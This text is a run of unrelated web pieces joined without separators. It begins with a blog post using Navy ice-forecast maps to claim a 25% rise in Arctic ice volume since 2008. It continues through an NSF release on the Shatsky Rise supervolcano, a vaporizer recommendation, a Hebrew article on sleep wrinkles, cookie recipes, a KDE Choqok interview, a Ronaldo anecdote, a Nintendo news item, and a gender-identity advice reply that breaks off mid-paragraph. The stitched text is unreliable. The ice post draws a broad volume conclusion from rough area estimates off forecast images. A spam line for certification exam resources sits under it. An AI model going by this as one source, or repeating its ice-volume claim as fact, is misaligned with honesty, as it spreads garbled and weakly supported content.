By Steve Goddard and Anthony Watts
The Navy requires accurate sea ice information for their operations , and has spent a lot of effort over the years studying , measuring , and operating in Arctic ice both above and below , such as they did in the ICEX 2009 exercise .
So , if you are planning on bringing a $ 900 million Los Angeles class submarine through the ice , as the captain might say to the analyst after receiving an ice report : “ you ’d better be damn sure of the ice thickness before I risk the boat and the crew ” .
Below is a blink comparator of U.S. Navy PIPS sea ice forecast data , zoomed to show the primary Arctic ice zone .
The blink map above shows the change in ice thickness from May 27 , 2008 to May 27 , 2010 .
As you can see , there has been a large increase in the area of ice more than two metres thick – turquoise , green , yellow and red .
Much of the thin ( blue and purple ) ice has been replaced by thicker ice .
Source images for the blink comparator :
http://www7320.nrlssc.navy.mil/pips2/archive/pips2_thick/2008/pips2_thick.2008052700.gif
http://www7320.nrlssc.navy.mil/pips2/archive/pips2_thick/2010/pips2_thick.2010052700.gif
This was quantified by measuring the area percentage in the Arctic Basin of the 0 - 1 , 1 - 2 , 2 - 3 , 3 - 4 , and 4 - 5 metre ranges .
The graph below shows the results .
This technique assumes an equal area projection , which should be fairly accurate north of 70N .
In 2008 , less than half of the ice ( 47 % ) was greater than two metres thick .
Now , more than 75 % of the ice is greater than two metres thick .
In 2008 , 18 % of the ice was more than three metres thick .
This year that number has increased to 28 % .
There has been nearly across the board ice thickening since 2008 .
There was slightly more 4 - 5 metre ice in 2008 , due to the big crunch in the summer of 2007 .
Now on to calculating the volume .
That calculation is straightforward :
volume = ( A1 * 0.5 ) + ( A2 * 1.5 ) + ( A3 * 2.5 ) + ( A4 * 3.5 ) + ( A5 * 4.5 )
Where A1 is the area of ice less than one metre , A2 is the area of ice less than two metres , etc .
The 2010/2008 volume ratio came out to 1.24 , which means there has been approximately a 25 % increase in volume over the last two years .
The average thickness has increased from about 2.0 metres to 2.5 metres .
That means an extra 20 inches of ice will have to melt this summer .
So far , this seems unlikely with the cold Arctic temperatures over the last couple of weeks .
http://ocean.dmi.dk/arctic/plots/meanTarchive/meanT_2010.png
Now let ’s look at the volume percentages .
In 2010 , 87 % of the ice ( by volume ) is greater than two metres thick .
But in 2008 , only 64 % of the ice ( by volume ) was greater than two metres thick .
A few weeks ago , when extent was highest in the JAXA record , our friends were asking for “ volume , not extent . ”
Their wishes have been answered .
Ice volume has increased by 25 % in the last two years , and those looking for a big melt are likely going to be disappointed .
Here is the measured data :
Do you think it odd that this increase is n’t prominently mentioned on the PIOMAS site ?
It seems very relevant .
— — — — — — — — — — — —— ——
–
If a man will begin with certainties , he shall end in doubts ; but if he will be content to begin with doubts he shall end in certainties .
– Sir Francis Bacon
Sponsored IT training links :
If your are looking for quick success in 350-018 exam then join today to explore useful 642-974 resources and pass EX0 - 101 on first try guaranteed .
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
From the National Science Foundation via press release :
Scientists explore origins of ‘ supervolcanoes ’ on the sea floor
Ancient goliaths blamed for multiple mass extinctions
“ Supervolcanoes ” have been blamed for multiple mass extinctions in Earth ’s history , but the cause of their massive eruptions is unknown .
Despite their global impact , the eruptions ’ origin and triggering mechanisms have remained unexplained .
New data obtained during a recent Integrated Ocean Drilling Program ( IODP ) expedition in the Pacific Ocean may provide clues to unlocking this mystery .
To explore the origins of these seafloor giants , scientists drilled into a large , 145 million - year - old underwater volcanic mountain chain off the coast of Japan .
IODP Expedition 324 : Shatsky Rise Formation took place onboard the scientific ocean drilling vessel JOIDES Resolution from September 4 to November 4 , 2009 .
Preliminary results of the voyage are emerging .
“ ‘ Supervolcanoes ’ emitted large amounts of gases and particles into the atmosphere , and re-paved the ocean floor , ” says Rodey Batiza , marine geosciences section head in the National Science Foundation ( NSF ) ’s Division of Ocean Sciences , which co-funded the research .
The result ?
“ Loss of species , increased greenhouse gases in the atmosphere , and changes in ocean circulation , ” says Batiza .
In fall 2009 , an international team of scientists participating in IODP Expedition 324 drilled five sites in the ocean floor .
They studied the origin of the 145 million - year - old Shatsky Rise volcanic mountain chain .
Located 1,500 kilometers ( 930 miles ) east of Japan , Shatsky Rise measures roughly the size of California .
This underwater mountain chain is one of the largest supervolcanoes in the world : the top of Shatsky Rise lies three and a half kilometers ( about two miles ) below the sea ’s surface , while its base plunges to nearly six kilometers ( four miles ) beneath the surface .
Shatsky
Rise is composed of layers of hardened lava , with individual lava flows that are up to 23 meters ( 75 feet ) thick .
“ Seafloor supervolcanoes are characterized by the eruption of enormous volumes of lava , ” says William Sager of Texas A&M University , who led the expedition with co-chief scientist Takashi Sano of Japan ’s National Museum of Nature and Science in Tokyo .
“ Studying their formation is critical to understanding the processes of volcanism , and the movement of material from Earth ’s interior to its surface . ”
About a dozen supervolcanoes exist on Earth ; some are on land , while others lie at the bottom of the ocean .
Those found on the seafloor are often referred to as large oceanic plateaus .
Current scientific thinking suggests that these supervolcanoes were caused by eruptions over a period of a few million years or less–a rapid pace in geologic time .
Each of these supervolcanoes produced several million cubic kilometers of lava–about three hundred times the volume of all the Great Lakes combined –dwarfing the volume of lava produced by the largest present - day volcanoes in places like Hawaii .
Since the 1960s , geologists have debated the formation and origin of these large oceanic plateaus .
The mystery lies in the origin of the magma , molten rock that forms within the Earth .
A magma source rising from deep within the Earth has a different chemical composition than magma that forms just below Earth ’s crust .
Some large oceanic plateaus show signs of a deep - mantle origin .
Others exhibit chemical signatures indicative of magma from a much shallower depth .
The IODP Shatsky Rise expedition focused on deciphering the relationship between supervolcano formation and the boundaries of tectonic plates , crucial to understanding what triggers supervolcano formation .
JOIDES Resolution departing from Yokohama , Japan , on the Shatsky Rise expedition .
A widely - accepted explanation for oceanic plateaus is that they form when magma in the form of a “ plume head ” rises from deep within the Earth to the surface .
An alternative theory suggests that large oceanic plateaus can originate at the intersection of three tectonic plates , known as a “ triple junction . ”
Shatsky
Rise could play a key role in this debate , because it formed at a triple junction .
However , it also displays characteristics that could be explained by the plume head model .
“ Shatsky Rise is one of the best places in the world to study the origin of supervolcanoes , ” says Sager .
“ What makes Shatsky Rise unique is that it ’s the only supervolcano to have formed during a time when Earth ’s magnetic field reversed frequently . ”
This process creates “ magnetic stripe ” patterns in the seafloor .
“ We can use these magnetic stripes to decipher the timing of the eruption , ” says Sager , “ and the spatial relationship of Shatsky Rise to the surrounding tectonic plates and triple junctions . ”
Sediments and microfossils collected during the expedition indicate that parts of the Shatsky Rise plateau were at one time at or above sea level , and formed an archipelago during the early Cretaceous period ( about 145 million years ago ) .
Shipboard lab studies show that much of the lava erupted rapidly , and that Shatsky Rise formed at or near the equator .
As analyses continue , data collected during this expedition will help scientists resolve the 50 year - old debate about the origin and nature of large oceanic plateaus .
###
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
Not sure which portable vaporizer is the best ?
For an all - around excellent portable vaporizer , I highly recommend the Arizer Solo .
It uses a combination of conduction and convection heating that is very efficient and cooks herbs very evenly .
In addition , it has an all - glass vapor path which results in a clean flavor .
It also has the longest battery life and it is built like a tank .
If you need something more stealthy and pocket - sized , I would get the Pax by Ploom , DaVinci Ascent , or the Arizer Air .
The Pax is by far most stealthy because of its elegant simplicity + compact size .
The Ascent has the best flavor thanks to its all - glass vapor path .
And the Arizer Air is basically a slimmed down version of the Solo .
If you are on a budget , then I would recommend the Magic Flight Launch Box .
It is very affordable , but requires practice and technique , otherwise you might end up combusting your herb .
Last Updated : Jan 1 , 2016
מי מאיתנו לא מפחדת מקמטים ומוכנה לעשות המון כדי להעלים אותם או לפחות למנוע את הופעתם של קמטים נוספים ?
בין העצות הפופלריות ביותר אפשר למצוא עצות על תזונה נכונה ובריאה , צמצום החשיפה לשמש , שמירה על לחות העור ושימוש במוצרים טבעיים או תעשייתיים לשימור העור ולטיפול בקמטים .
אבל יש עולם שלם של מניעה וטיפול בקמטים שלא מקבל לדעתי את המקום הראוי לו למרות שמדובר בפעולה שלוקחת לרובנו בין רבע לשליש מהחיים שלנו ואני מדברת על שינה .
על פי האקדמיה האמריקאית לדרמטולוגיה ( AAD ) , שינה בתנוחות מסוימות לילה אחר לילה תגרום לקווי שינה .
כלומר לקמטים המופיעים על פני העור אך לא חודרים לשכבות העמוקות של העור .
קמטים אלו לרוב נעלמים לאחר הקימה ולכן אנו לא נוטים לייחס להם חשיבות רבה .
אך כאשר מדובר בתהליך מצטבר של שעות , ימים ושנים מדובר בתוספת שחיקה של העור המחייב משאבים גדולים יותר מפעם לפעם עד להתאוששות המלא ה
שינה בתנוחות מסוימות , במיוחד על הבטן , עלולה להוביל לקמטים בולטים יותר .
שינה על הצד , למשל , מגדילה את הקמטים על הלחיים והסנטר , בעוד השינה עם הפנים כלפי מטה מגדילה את הקמטים על המצח .
ניתן למנוע קמטים אלו באמצעות שינוי הרגלי השינה .
ידוע כי שינה על הגב היא אחת מתנוחות השינה הבריאות ביותר לא רק לקמטים אלא למערכות גופניות רבות שיכולות להתאושש ביתר קלות .
ישנם הטוענים כי גם תנוחת העובר על הצד היא תנוחה בריאה לתקופות מסוימות אך כאמור היא עלולה לגרום לקמטים בסנטר ובלחיים .
כדי להתרגל לישון על הגב ניתן לעשות שימוש בכרית סביב הצוואר כמו כריות המסייעות לשינה במטוס או בנסיעות .
כריות אלו מקבעות את הראש ומאפשרת תמיכה צידית עד שהגוף מתרגל להחזיק עצמו באיזון .
תמיכה נוספת היא כרית מתחת לברכיים , כרית כזו יכולה לסייע להוריד לחץ מהגב התחתון שעלול לגרום לחלק מהאנשים הרגישים יותר קושי להירדם על הגב .
פתרונות נוספים הם כרית באיכות טובה שאינה מכותנה ( כרית כותנה יוצר ת לחץ על העור שגורם לקמטים ולכן עדיף לבחור בכריות נוצות או כריות סאטן ) או מריחת וזלין על עור הפנים לפני השינה – וזלין הוא חומר מעולה לשמירה על לחות העור .
חשוב שתדעי מודעות להשפעות השינה על קמטי הפנים שלך ותחפשי את הפתרונות הנכונים עבורך .
All featured products are curated independently by our editors .
When you buy something through our retail links , we may receive a commission .
Girl Scout cookies are one of the highlights of the year :
Their scarcity ( along with their deliciousness ) makes them a seasonal treat to look forward to each year .
But if you ’re craving a Girl Scout cookie in the middle of the summer , check out these copycat recipes for homemade versions that are just as tasty as the originals ( though perhaps not quite as uniform ) .
Related Reading : Paint the Colors of the Rainbow with This Recipe for Italian Tricolor Cookies
Slim Mints are the new Thin Mints .
Peppermint oil , vanilla extract , and unsweetened Dutch - process cocoa powder form the basis of these tiny chocolate delights .
The semisweet chocolate coverture is silky and delicious .
Make a double batch and keep some of the cookies in the freezer for a spur - of - the - moment treat .
Get our Thin Mints recipe .
This take on Samoas has all the key characteristics : shortbread , caramel , coconut , and chocolate .
Use a small cookie cutter to cut these into doughnut - shaped rings , or make any shapes you want — they ’ll still taste just as good as you remember them , as long as you make sure to toast the unsweetened , flaked coconut until it ’s nice and brown .
Get our Samoas recipe .
These are even better than the traditional Tagalong , with the addition of natural peanut butter and milk chocolate coating .
If you want to change it up a little , use crunchy peanut butter or choose a brand that ’s salted .
Additionally , you can flavor the shortbread base – think cocoa powder or mini chocolate chips for extra decadence .
Get our Tagalongs recipe .
Do -Si-Dos are the most addictive peanut butter cream sandwich cookies you ’ve ever come across .
The filling in our Do - Si -Dos recipe is a combination of butter , powdered sugar , and crunchy peanut butter , but you can use smooth if you prefer .
And if you do n’t want to pipe the filling , just use a spoon to place it between the cookies .
A simple lemon-y sugar cookie , Savannah Smiles are really easy to make at home — good thing , since they were discontinued in 2019 — and go beautifully with a cup of hot tea .
This recipe only has five ingredients : flour , butter , powdered sugar , fresh lemon ( juice and zest ) , and a little bit of salt .
Flatten the dough balls on the baking tray and shape into half moons to keep the look authentic — or do n’t ; they ’ll still be delicious .
Especially if you roll them in extra powdered sugar when they cool .
Get the Savannah Smiles recipe .
Trefoils are actually just a basic , extremely simple shortbread recipe !
Roll the dough out and use a cookie cutter ( any shape you want ) to cut out the cookies , or go freehand .
If you want to get fancy you can add in some herbs or other flavorings to the shortbread , but then it would n’t be a proper homage to your beloved Trefoil .
Keep the dough wrapped tightly in plastic in the freezer and you can keep these on hand to bake fresh for guests in only ten minutes .
Get the Trefoils recipe .
This take on Lemonades is extremely close to the traditional Girl Scout cookie .
The lemon icing is what really differentiates them from the pack .
Roll the dough into logs and use plastic wrap to help you shape them evenly .
You can even stamp the cookies with a cookie stamp if you want them to look just as pretty as the originals .
Get the Lemonades recipe .
Nordic Ware Heirloom Cookie Stamps , 3 for $ 26.95 from Sur La Table
The flower stamp will give you the perfect look .
Buy Now
This cookie is multilingual and scrumptious .
A chocolate - dipped shortbread , this is a simple recipe that you can personalize with different messages and stamps on the top ( the original version expresses thanks in five different languages , but you do you ) .
Be sure to wait until the cookies are completely cooled before you try to dip them in the melted chocolate or it wo n’t adhere properly .
Get the Thanks - A - Lot Cookie recipe .
One of the newer additions to the Girl Scout cookie family , their s’mores cookies actually come in two varieties : one is crispy and coated in layers of white frosting and chocolate frosting ; the other is a classic sandwich cookie with marshmallow icing and chocolate inside .
This S’mores Sandwich Cookie recipe follows the latter format , but has a totally different texture , with soft and chewy graham - flavored cookies sandwiching toasted marshmallow fluff and thick dark chocolate .
Basically , there ’s no wrong way to combine these three flavors !
And if you ’ve ever wondered where s’mores came from in the first place , you actually have the Girl Scouts to thank for that too .
A rich butter cookie packed with toffee bits ( and magically gluten - free ! ) this take on the toffee - tastic cookie is still gluten - free , but uses old - fashioned rolled oats as the base .
Heath milk chocolate baking bits are what make these so good — and they ’ll last up to two weeks stored in an airtight container so feel free to make a big batch .
Get the Toffee - tastic Cookie recipe .
In 2019 , the Girl Scouts added a new gluten - free offering with rich caramel , chocolate chips , and a hint of sea salt .
Here ’s hoping they bring them back whenever cookie season kicks off again — but in the meanwhile , this Gluten Free Caramel Chocolate Chip Cookie recipe should hit the spot .
See even more of our favorite copycat recipes for everything from Trader Joe ’s staples to Olive Garden soup .
Related Video : These Tagalong - Inspired Peanut Butter Chocolate Blondies Are Amazing
Header image by Chowhound .
Anyone who has taken a class in economics is familiar with the difference between the direct cost of something and its ' opportunity cost ' .
Developing free software is a great example of this difference .
A KDE developer does not have to spend hundreds of dollars on an SDK , he only needs to give up some of his time to develop .
The time given up could have been used working to earn money or doing another leisure activity ; however , many choose to develop anyway .
Other KDE developers have asked for sponsorship ( the Krita team , for example ) to allow them to put in more serious time .
Now Mehrdad Momeny ( mtux on IRC ) has gone a step further by linking the prioritization of particular features in microblogging client Choqok with donations , perhaps a way of feeding developers .
We were interested in his idea , so we had a nice IRC discussion with him a while ago to learn more .
Choqok : KDE microblogging Choqok : KDE microblogging
Who are you ?
I am Mehrdad Momeny , a Persian Free Software enthusiast and the developer of Choqok , currently serving conscription .
I am 24 years old and live in Mashhad , Iran , east of Tehran .
I 'm also one of the developers of Blogilo ( KDE Blog client ) and MDIC ( a simply dictionary application ) .
Can you tell us a bit about the history of Choqok ?
About a year ago - two weeks before the first release of Choqok - I felt that no Twitter client filled my needs .
So I started to write a tiny one for myself .
After I finished the first version , I put it up on KDE - Apps and there was some interest in it ; there was no KDE client other than the KDE Microblogging Plasma Widget .
The next version was added to the Kubuntu repositories by Harald Sitter .
In short , Choqok filled a gap for not only me , but it seems to have filled a gap for other KDE users too !
What do you have in mind for the future ?
What the users want !
Choqok has been the answer to the needs of many users , but there are many features that can be added if users want those features to be developed .
I started developing Choqok because I wanted a micro-blogging client with notifications and a ' Quick Post ' feature .
In the future I would like to add anything the users would like .
Like many developers , I can only write code in my free time .
As I am in the military that can be particularly problematic ; I do n't always get leisure time to develop Choqok , but I do n't want to leave it unmaintained or stop its development .
So how would you like us to help you develop the features we would like ?
I understand some users might like to have new features and ideas integrated sooner than would otherwise happen and I could make that possible if they were willing to support me in developing .
I 've launched a forum where users can post ideas of features they would like implemented .
They can discuss the ideas there and we can figure out how much of a donation it would take for them to be developed .
Once we have an idea and a donation I can begin and quickly finish development of the feature .
Thanks and good luck with this initiative , Chokoq development and your other projects !
Free Software has great ambitions and bringing them into reality takes considerable resources .
It is good to see developers looking for new ways of allowing them to contribute more of their time to FOSS !
A side to the superstar that not many get to see ...
My name is Dan Gaspar and I want to share a story about Cristiano Ronaldo .
It ’s a story that I ’m sure you are not aware of , but one that needs to be told .
I believe in destiny - this is an example .
Behind the superstar celebrity is a genuine and caring human being .
I was fortunate to be invited by Professor Carlos Queiroz , Portugal National Team Coach to join their staff for qualification for the 2010 World Cup I have worked with Carlos before , and I felt honoured to be a part Portugal ’s preparation .
Not long after , I received a phone call from a good friend , John Moreira .
John has worked at Star Goalkeeper Academy , a camp which I own .
He and his family are good friends of mine and have been for many years .
His son Brandon , who was a quality soccer player , was experiencing knee problems .
The doctors initially thought that he was suffering from a soccer injury .
It turned out that Brandon had Osteosarcoma ( bone cancer ) .
The Moreiras had a difficult decision to make ; amputate the leg or receive chemotherapy in the hopes that they could catch all of the cancer .
Brandon ’s passion was football .
The thought of having one of his legs amputated was devastating to the teenager .
He could n’t imagine a life with one of his legs missing .
The family opted for chemotherapy
Throughout this trying period , John had kept in touch with me and regularly updated me on Brandon ’s status .
So it was devastating to hear that not only did the chemo fail to shrink the size of the tumor , but the cancer had metastasized to other parts of the body .
John and I shared a special bond , and I felt compelled to be there for my friend and his family .
I jumped onto a plane and flew to Toronto .
Brandon was a very special young man .
Instead of me offering Brandon support and courage , Brandon gave me much more than I could give him .
He was calm , brave and his warrior - spirit imbued his house with a sense of peace .
He was an inspiration .
Despite having lost considerable weight and entangled in oxygen tubes , in his soft - spoken voice he always managed to say just the right thing .
He pleaded with everyone not be angry and that God is good .
Sixteen years old !
That was his gift to all of us .
His dad John said that Brandon had created a bucket of wishes .
One of his wishes was to go to Old Trafford and watch Ronaldo train .
Given the circumstances , that wish was not going to come true .
Like so many kids around the globe , Ronaldo was Brandon ’s idol .
He thought Ronaldo was the best footballer on the planet .
Pictures of the Portuguese winger in full gallop gliding with ease past bewildered defenders covered Brandon ’s bedroom wall .
John asked me if I would contact Ronaldo and ask him to call his dying son .
I informed John that I did only one game with Portugal ’s U - 23 team with Ronaldo .
The likelihood of Ronaldo remembering me was remote but I would do my best .
I wanted so badly to fulfill Brandon ’s wish .
He was a remarkable human being , and it was the least that I could do for my friend and his son .
I called the Head Coach of Portugal National Team , Carlos Queiroz and explained Brandon ’s situation .
Carlos and I have worked together on many projects and we have known each other for years .
We are brothers .
I said to Carlos , “ I have not asked you for much , but this is a special request and it would mean a lot to me if you could help me as well as my friend " .
Carlos said he would do his best , but he could not make any promises .
But I knew that if anyone had the influence to be able to help me to help Brandon and his family , it was Carlos Queiroz .
To contact Ronaldo you have to go through several layers of people – agents , managers , lawyers , etc … and you never know how long that may take .
Carlos called me back the same day and said , “ The mission is in motion ” .
I knew that Carlos would come through .
In the meantime , I knew Brandon was a Manchester United , Benfica and FC Porto fan .
I called my contacts and asked if they could call Brandon , to give him strength and urge him to continue to fight his battle .
José Moreira from Benfica , Carlos Queiroz from Manchester United and Vitor Baia from FC Porto all called to wish him well and to have the courage to continue to fight .
They were all special , but they were not Ronaldo - he had still not called .
I needed to get back to the University of Hartford .
The Hartford Hawks had a game on Saturday evening and I flew back on the Friday before .
Saturday was a great evening .
The University of Hartford beat The University of New Hampshire and I also received a call from John that Ronaldo did call .
It was a tremendous relief for me , and I knew what it meant to Brandon .
In fact , he promised Brandon he would call the following day .
Brandon ’s house was full of his friends , anxiously waiting for his phone to ring .
Ronaldo did not disappoint .
He called and Brandon and a house full of friends and family were overjoyed .
Manchester United was playing away to Chelsea that weekend in September .
Ronaldo promised to send his match jersey and boots to Brandon .
Brandon was ecstatic , but it was the conversation that he cherished most .
He said " I can't believe I just spoke with my idol , Cristiano Ronaldo -- I am the happiest kid alive . ”
A couple of days later Ronaldo went on to text Brandon to see how he was feeling .
Brandon , only 17 , died on October 3 , 2008 .
Ronaldo sent his autographed boots , framed jersey and a telegram with his condolences .
But in his telegram it was this message that moved Brandon ’s family the most .
It said , “ true champions are those who fight till their last breath , and that is the image I have of Brandon . "
I returned to Toronto to attend Brandon ’s wake and funeral .
All of Ronaldo ’s items were wrapped around the casket .
It was amazing .
In February I returned to Toronto to do a goalkeeper seminar .
John asked me to go for a ride .
We went to Brandon ’s mausoleum .
I was stunned by what I saw - Cristiano Ronaldo ’s bronzed jersey and boots .
Beneath them were engraved the words from Ronaldo 's text message .
Carlos Queiroz invited me to join the Portugal ’s National Team as it prepared for its World Cup qualification match against Albania on June 6 , 2009 and a friendly match against Estonia on June 10 .
It ’s fascinating how life works ; of course I accepted the invitation to join Portugal ’s staff with honour .
The team included the FIFA selection for the 2008 World Player of the Year , Cristiano Ronaldo .
His transfer from Manchester United to Real Madrid was a world record of $ 133 million .
When John ’s family knew I was going to join the National Team they had a request .
They had several items they wanted Ronaldo to sign and they wrote a thank - you card for him .
I flew to Toronto to meet with John ’s family and to pick up the items they wanted signed by Ronaldo .
Then it was off to Lisbon for a national team training camp .
When I arrived at training camp I let a few days pass before I approached Ronaldo .
As you can imagine , everyone wants a piece of him .
During lunch one afternoon , Ronaldo and I were near the buffet table .
I told Ronaldo that I had a special story to share with him , and could we spend a few minutes together ?
He agreed and met me in my room .
It was an emotional meeting as I shared with Cristiano all the details of the impact he had on Brandon , his family and friends .
Ronaldo listened carefully .
I wanted to emphasize the responsibility an athlete like Cristiano has to young and impressionable people like Brandon .
As we talked , it was touching to see a vulnerable and compassionate side to a guy who is a warrior on the field .
The last thing I mentioned to Ronaldo was that Brandon had kept a daily diary .
On the last page it read , " I spoke to Ronaldo , I can now go to heaven . "
That is the truth behind Cristiano Ronaldo .
Dan Gaspar
University of Hartford Men's Soccer Coach , www.hartfordhawks.com
Star Goalkeeper Academy Founder , www.stargoalkeeper.com
Connecticut Soccer School President , www.ctsoccerschool.com
NINTENDO
Australia fears it could be swamped by requests for freebies after a cute story of goodwill went viral on the internet .
11 - year - old Victorian schoolgirl Helen last month wrote to the company as part of her Year 6 class project .
" The reason I 'm writting ( sic ) to your company is because at school we are learning how to write letters to companies , " Helen wrote .
" We have 25 students in our class and we have 25 companies .
I chose your company because I 'm a big fan of yours . "
In fact Helen was such a big fan of Nintendo she could n't resist asking for a DS gaming console after her parents " refused " to buy her one .
" I also have a request to make .
My request is quite big .
I would like a DS please for those many reasons , " Helen wrote .
Nintendo obliged and sent a new DS to Helen 's school along with a letter of reply to the young girl .
" Thank you for your letter — we were very impressed .
I really hope you and your classmates enjoy playing the DS , " wrote a Nintendo staff member .
Now the exchange — including Helen 's letter and Nintendo's reply — has gone viral on the internet .
Just two days after being posted online , the exchange has been viewed more than 330,000 times on image - sharing site imgur .
It has also attracted thousands of votes on link - sharing websites like Reddit and Digg .
But for every reader that responded with a " daaaaw " , there 's another who has joked about trying it out for themselves .
" So I can just send any company a letter and they will give me a product ? " asked one reader on Digg .
" I 'm going to send a letter to Steve for a certain pad , " said another .
However if you 're thinking about writing to Nintendo under the pretence of a school project , be warned — they verify all requests .
" Nintendo always calls the school , hospital , retirement home , or whatever it may be to ensure the letter is legitimate , " said Nintendo Australia 's Heather Murphy .
" In this particular case , Nintendo called the school and spoke to the school principal . "
After talking to the principal to make sure the gaming console would be well used , Nintendo sent a DS and a " game suitable for children to play " to the school .
Ms Murphy said it was n't common practice to give away free consoles — or even reply — to everyone who wrote to the company .
She said it received " hundreds " of letters per day .
" Nintendo does not routinely give away products in response to letters .
From time to time , we may donate product to schools , hospitals or retirement villages , " she said .
" We receive a high number of letters on a daily basis , and unfortunately we are not able to respond to every one .
" So therefore we hope we do not receive an influx as we simply would not be able to respond . "
However Ms Murphy said Nintendo would like to thank everyone who had written to the company already .
" Especially those letters that tell Nintendo about their experiences with our products and how and why they enjoy them so much , " she said .
LondonIsABurning
Fire asks :
I ’m a girl , but I ’ve always felt like I ’m in the wrong body .
Every time I picture myself , I see a boy .
I want to get a sex change , but I know how much it can cost .
My parents are also Catholic , and are already angry about me not being religious , and every time I try to bring up the subject , they get angry and tell me that I was “ made a girl ” , so I should only feel like one , and that everything else I feel is wrong .
But my friends are very supportive , and I even have a guy friend who wants to be a girl .
Who do I listen to ?
Heather Corinna replies :
You listen to your own feelings and sense of self .
You ’re the expert when it comes to your own identity .
Sex .
Abortion .
Parenthood .
Power .
The latest news , delivered straight to your inbox .
SUBSCRIBE
While a sex is assigned to us at birth , and people may have the idea that also determines our gender , that stands in conflict with the fact that sex and gender are different words that mean different things , and the only ultimate authority on our gender is us .
Sex ( not the do - me - baby kind , the other meaning ) is a classification most accurately made with what ’s called a karyotype , a test that identifies the size , shape , and number of our chromosomes by examining our cells .
That test can tell us if someone is XX or XY , female or male , respectively , or other combinations , like XXY , XO , XXX or XYY .
Even just when we ’re talking about sex , not gender , the world is made up of far more than just male and female .
But most people do n’t have karyotypes done , so for most of us , sex is assigned to us at birth via a doctor who just looks at our genitals and decides if they look female - bodied or male - bodied in their estimation .
I know : it ’s totally whack that something that is such a huge deal in our lives and to the world is something determined in but a brief moment by a fleeting glance .
One of the many troubles with that way of determining sex is also that sex is not always so clear based on genitals .
Some people are born with what is currently called “ ambiguous genitalia , ” which is what it sounds like : tough to class as male or female .
Some of those folks are XX or XY , some are intersex , but regardless , docs still sex a person on paper as male or female in those cases .
So , people ’s idea of sex as binary is already incorrect , but the idea that gender identity is ( or is determined by sex ) is even more off - base .
As I explain here :
Gender is n’t about biology or science .
Gender is a variety of concepts and ideas about how we or others may or do look , act , relate and interrelate , based on sex and / or gender identity or other ’s perception or understanding of sex or gender .
Gender is n’t anatomical : it ’s intellectual , psychological and social ( and optional ) ; about identity , roles and status based on ideas about sex and what it means to different people and groups .
As part of that set of concepts is also the idea — even though we know by now it ’s flawed — that gender is only male or female in the first place .
Like sex , gender is often presented as binary : as being only one thing or the other , without any overlap or grey area in between .
When we talk about sex , we ’re talking about what we consider or call male , female or intersex based on chromosomes and / or reproductive systems : when we talk about gender , we ’re often talking about what is considered masculine and what feminine .
If our doctors or midwives were to call out our gender at birth , rather than our sex , they would instead be shouting “ High heels ! ” or “ Sneakers ! ”
Gender or gender identity is n’t just about masculine or feminine , either .
Many — if not most — people ’s experience of sex or gender , and ideas about sex or gender , are not that binary .
There ’s no one way or right way to experience or conceptualize our sex or our gender , and even for those who stick only to masculine and feminine as ways to describe gender , people do n’t all universally share the same ideas of what those words or concepts mean .
Some people ’s gender identity feels like a “ match ” with what their sex is or was assigned as .
Cis gender is the current term we have for those people .
It sounds like your mother is probably cis gender .
It may be that she was “ born a girl ” and also feels like a girl , or , more accurately , feels like what she thinks girls feel like .
I ’m also someone who was assigned female sex at birth and who identifies as a woman .
But I know the way I experience , present and conceptualize my gender as a woman is not the same as how all other people who identify as women experience , present and conceptualize theirs , whether they are cis gender , trans , genderqueer or something else entirely ( personally , I often feel somewhere between cis gender and genderqueer ) .
I also know the way I experience sex and gender as someone assigned female at birth who is not trans is very different than the way someone who is trans does , even though I have also had times where I felt my gender and my sex were at odds .
The idea that “ girls should feel like girls ” does n’t recognize the inarguable fact that not all girls look , act or feel the same way , are n’t all embodied the same way , nor do all people who were “ born as ” girls conceptualize gender or identify their gender identically .
Let ’s get you up to speed with a few other things you asked about before we talk about your folks .
“ Sex change ” is a vague term and is language we do n’t really use anymore .
When it comes to surgery to change or adapt someone ’s genitals , that ’s what we call gender or sexual reassignment surgery ( SRS ) .
Some people say “ sex change ” to mean that surgery or any number of the medical procedures or processes involved in making changes to the body in regard to sex or gender .
“ Transitioning ” is the current term which refers to the whole of someone ’s intentional intellectual , emotional , interpersonal and physical process in aligning their life and body with their gender identity .
Transitioning is usually a long process over many years , much like puberty is , and it ’s one where not everyone takes the same steps or does the same things .
For some people , a transition may only involve changing how they dress and what language or names they use for themselves .
Others may do those things and do hormone therapies to change the chemistry of their bodies .
Others still may do all of those things and have certain kinds of surgeries to change the external appearance of their bodies .
For those who choose to have surgery , therapy is also part of those things as part of their protocol , and even people who do n’t do surgeries or hormones often use some kind of counseling or talk therapy for support and help in their transition .
Not everyone has any kind of surgery at all , or gets all the kinds of surgeries they could have .
Some FTM ( female - to - male ) trans people only have top surgery ( surgery that removes the breasts ) , but not bottom surgery ( which changes the appearance and function of the external genitals , like creating a penis ) .
Some have both , and some FTMs have their uteri , fallopian tubes and / or ovaries removed .
Sometimes people just do n’t want or feel the need for some or all of those surgeries , while other times they want them , but ca n’t access them for various reasons , the biggie being that they are usually very costly , another being that in most places a person has to qualify for these surgeries , not just be able to pay for them .
Not everyone will be given permission through the healthcare system to have those surgeries .
What surgery costs will vary on what someone chooses to do , and can range anywhere from around $ 7,000 to over $ 50,000 .
The cost of other parts of transitioning and qualifying for surgery , like hormones and therapy , are additional costs .
In some parts of Canada ( and in some other countries ) , though , national healthcare will cover the cost of some or all surgeries for trans people who have met the criteria as well as for talk and hormone therapies .
However , someone in their early teens is not going to be able to have most of those surgeries yet , and if and when you can per your health , until you ’re a legal adult , you ’d usually need parental consent .
I know all of that may be overwhelming .
It ’s tough to say what you will want to do with all of those options , and tough to figure without spending more time talking with you and being in this process with you what your unique gender identity is .
As well , your parents being so closed to all of this is going to make it tougher for you to figure it out for yourself , because that ’s much harder to do without real freedom to explore all the possibilities .
I ’m sorry your parents are being so unsupportive and also have ideas about gender that are in conflict with your gender identity .
Those ideas are also in conflict with the most current medical , scientific and sociological data , study and thought on sex and gender .
Some parents handle having gender fluid children very well .
Many , unfortunately , do not .
Why parents and other people can have such a hard time is both simple and complex .
The simplest reason others have a hard time most often seems to be because someone gendervariant can feel like a challenge or a threat to the gender identity of someone who is not ( even though it is n’t ) , and to the whole system of binary gender or assigned sex , which some people are very deeply invested in when it comes to how they understand themselves and the world .
It ’s kind of like how people who grow up with and surrounded by lots of wealth who cling to the idea no one is actually poor can react when they accidentally drive into a ghetto .
Suffice it to say , throwing gobs of money out the window is not what usually happens in that situation .
